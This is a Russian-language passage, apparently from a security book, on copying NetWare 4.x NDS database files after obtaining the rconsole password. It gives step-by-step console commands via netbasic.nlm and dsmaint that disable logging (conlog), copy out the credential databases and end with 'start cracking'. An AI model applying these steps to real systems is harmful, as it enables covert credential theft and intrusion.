Получение доступа к файлам NDS
После приобретения пароля утилиты rconsole осталось выполнить завершающий шаг – получить доступ к файлам NDS. В системе NetWare файлы NDS содержатся в скрытом каталоге _netware тома SYS. Доступ к этому каталогу можно получить лишь через доступ к консоли (для взломщика – утилите rconsole). Для "захвата" файлов NDS существует много методов. И как вы скоро убедитесь, у каждого взломщика имеются свои любимые приемы.
netbasic .nlm (SYS: SYSTEM)
Набор средств разработки программного обеспечения NetBasic представляет собой язык сценариев, который изначально был разработан компанией High Technology Software Corp. (для краткости HiTecSoft). С его помощью можно конвертировать сценарии NetBasic в формат NLM (NetWare Loadable Module) компании Novell и использовать их на Web-сервере системы NetWare. Компонент netbasic.nlm имеет уникальную особенность, которая изначально была обнаружена взломщиками: с его помощью из командной строки можно про смотреть весь том, включая скрытый каталог _netware.
Средства NetBasic по умолчанию устанавливаются на всех серверах NetWare 4.x, так что их очень часто используют для получения доступа к файлам NDS. Для этого выполните следующую последовательность действий и команд.
- С помощью команды SYS: \PUBLlc\rconsole получите доступ к консоли rconsole.
- unload conlog (удаляет утилиту, регистрирующую консольные сообщения, и отключает режим регистрации).
- load netbasic.nlm.
- shell.
- cd \_netware (скрытый системный каталог, который можно увидеть только с системной консоли).
- md \login\nds.
- copy block.nds \login\nds\block.nds.
- copy entry.nds \login\nds\entry.nds.
- copy partitio.nds \login\nds\partitio.nds.
- copy value.nds \login\nds\value.nd s.
- exit (выход из оболочки).
- unload netbasic.
- load conlog (вновь загружаем утилиту регистрации).
- Со стороны клиента воспользуйтесь командой mар, чтобы подключить сетевой диск, указав путь к созданному ранее каталогу LOGINXNDS.
- Скопируйте файлы *.NDS на свой локальный компьютер.
- Приступайте к взлому.
dsmaint
Может оказаться, что на целевом сервере язык сценариев NetBasic не установлен. В этом случае придется воспользоваться альтернативным средством – dsmaint. Этот модуль NLM не является стандартным компонентом NetWare 4.11, однако его можно загрузить с Web-узла компании Novell http://www.support.novell.com. Файл называется DS411P.EXE. Однако будьте осторожны: при использовании компонента dsmaint работа службы каталога будет автоматически завершена, так что не стоит использовать его в рабочее время. Для того чтобы вернуться к исходному состоянию службы каталогов, необходимо запустить процесс восстановления. Другими словами, эти действия лучше не выполнять на рабочем сервере.
- Подключите сетевой диск, указав каталог SYS:SYSTEM.
- Скопируйте на сетевой диск модуль dsmaint .nlm.
- С помощью команды rconsole получите доступ к виртуальной консоли.
- unload conlog (удаляет утилиту, регистрирующую консольные сообщения, и отключает режим регистрации).
- Введите команду load dsmaint.
- Выберите команду Prepare NDS For Hardware Upgrade.
- Зарегистрируйтесь в качестве администратора.
В этот момент будет выгружена служба каталогов.
После этого в каталоге SYS:SYSTEM будет автоматически сохранен файл backup.nds.
- Выберите команду Restore NDS Following Hardware Upgrade.
- Введите команду load conlog.
- Co стороны клиента подключите сетевой диск, указав путь к каталогу SYS:SYSTEM.
- Скопируйте файл backup .nds на свой локальный компьютер.
- Воспользуйтесь утилитой extract из набора Pandora и создайте четыре файла NDS (block, entry, partitio и value).
- Приступайте к взлому.
Более старый загружаемый модуль dsrepair.nlm также предоставляет возможность подготовиться к обновлению аппаратного обеспечения. При этом в каталоге SYS: SYSTEM тоже будут созданы резервные копии файлов NDS. Однако этот модуль можно использовать только в более ранних версиях системы NetWare 4.x и, кроме того, он абсолютно не пригоден для применения в системах, в которых установлены пакеты обновления.